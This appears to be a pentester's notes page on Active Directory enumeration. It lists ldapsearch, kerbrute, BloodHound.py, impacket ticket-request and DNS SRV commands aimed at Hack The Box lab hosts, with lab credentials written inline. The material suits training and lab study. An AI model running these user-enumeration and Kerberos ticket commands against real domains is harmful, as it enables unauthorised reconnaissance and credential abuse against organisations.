Page cover image

AD Enumeration TOOL

Tools

Ldapsearch

(https://devconnected.com/how-to-search-ldap-using-ldapsearch-examples/) (https://devconnected.com/how-to-setup-openldap-server-on-debian-10/)

HackTricks Offensive WMI - Active Directory Enumeration (Part 5)

  • LLL-> shorten output, remove componets and version

  • x- simple authentication (password)

  • H - hostname with protocol

    • h- Ip addr

  • D - Bind DN

    • Windows userPrincipalName are acceptable.

  • w - password

  • b - base to search from


fold title='nmap Script for ldap'
 locate -r nse$|grep ldap
/usr/share/nmap/scripts/ldap-brute.nse
/usr/share/nmap/scripts/ldap-novell-getpass.nse
/usr/share/nmap/scripts/ldap-rootdse.nse
/usr/share/nmap/scripts/ldap-search.nse

ldap example

ldapsearch -x -H ldap://sizzle.htb.local -s base namingcontexts
ldapsearch -x -H ldap://sizzle.htb.local -s sub -b 'DC=HTB,DC=LOCAL'

Dumping only admin or users.

ldapsearch -x -H ldap://sizzle.htb.local -D 'amanda@htb.local' -w 'Ashare1972' -b 'dc=htb,dc=local' \
'(&(ObjectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))'
ldapsearch -LLL -x -H ldap://pdc01.lab.ropnop.com -b '' -s base '(objectclass=*)'

kerbrute

username Enum

kerbrute --dc 10.10.10.240 -d licordebellota.htb userenum user.txt --downgrade

Downgrade - its means downgrade the hash type. when kerberos choose their hash type the default is 23 often times they choose 18 which is more upgraded hash hashcat unable to crack it.

on the AD env. kerberos hash type cannot be changed 23 to 18 because of not all application are support 18 hash type. so they are gonna set the group policy to choose 18 hash type first for any application. then choose 23 is that application does not have 18. often times they are gonna set a group policy to monitor 23 hash type like who are gonna use it. for prevent malicious purpose.

Bloodhound.py

KRB5CCNAME=d.klay.ccache bloodhound-python -u d.klay -p 'Darkmoonsky248girl' -k -ns 10.10.11.181 -d absolute.htb -dc dc.absolute.
htb -c ALL --zip

impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl' -dc-ip 10.10.11.181

delete the DB MATCH (n) OPTIONAL MATCH (n)-[r]-() DELETE n,r and restart bloodhound.

Get a ticket

kinit absolut.htb/d.klay
klist

Sometime its hard to get a ticket [kerberos only care about 2 thing time and auth creds]:

ntupdate -s dcname/ip

Impacket-getST-Creds

Logoimpacket getst creds | WADComs
LogoNo Shells Required - a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA
impacket-getST -spn cifs/hope.windcorp.htb -dc-ip 192.168.0.2 -debug 'windcorp.htb/ray.duncan:pantera'

Topics

DNS

  • AD-DS relies heavily on DNS, especially SRV records for service discovery. most usefull & common ones:

dig -t SRV _gc._tcp.lab.ropnop.com         //Global Catalog
dig -t SRV _ldap._tcp.lab.ropnop.com
dig -t SRV _kerberos._tcp.lab.ropnop.com
dig -t SRV _kpasswd._tcp.lab.ropnop.com
nmap --script dns-svr-enum --script-args "dns-srv-enum.domain-'lab.ropnop.com'"

Domain Meta-data Trough Ldap

  • domainFunctionality

  • forestFunctionality

  • DomainControlerFunctionality

Value  Forest        Domain             Domain Controller
0      2000          2000 Mixed/Native  2000
1      2003 Interim  2003 Interim       N/A
2      2003          2003               2003
3      2008          2008               2008
4      2008 R2       2008 R2            2008 R2
5      2012          2012               2012
6      2012 R2       2012 R2            2012 R2
7      2016          2016               2016
ldapsearch -LLL -x -H ldap://pdc01.lab.ropnop.com -b '' -s base '(objectclass=*)'

MS-RPC

samba

  • rpcclient

  • smbclient

  • net

  • Impacket [ropnop binaries are also good]

Ldap

389-LDAP,636-LDAPS(SSL),3269-LDAP Global Catalog best is do nmap.

PreviousMSDT - Microsoft Support Diagnostic Tool VulnerabilityNextAD Certificate Templates

Last updated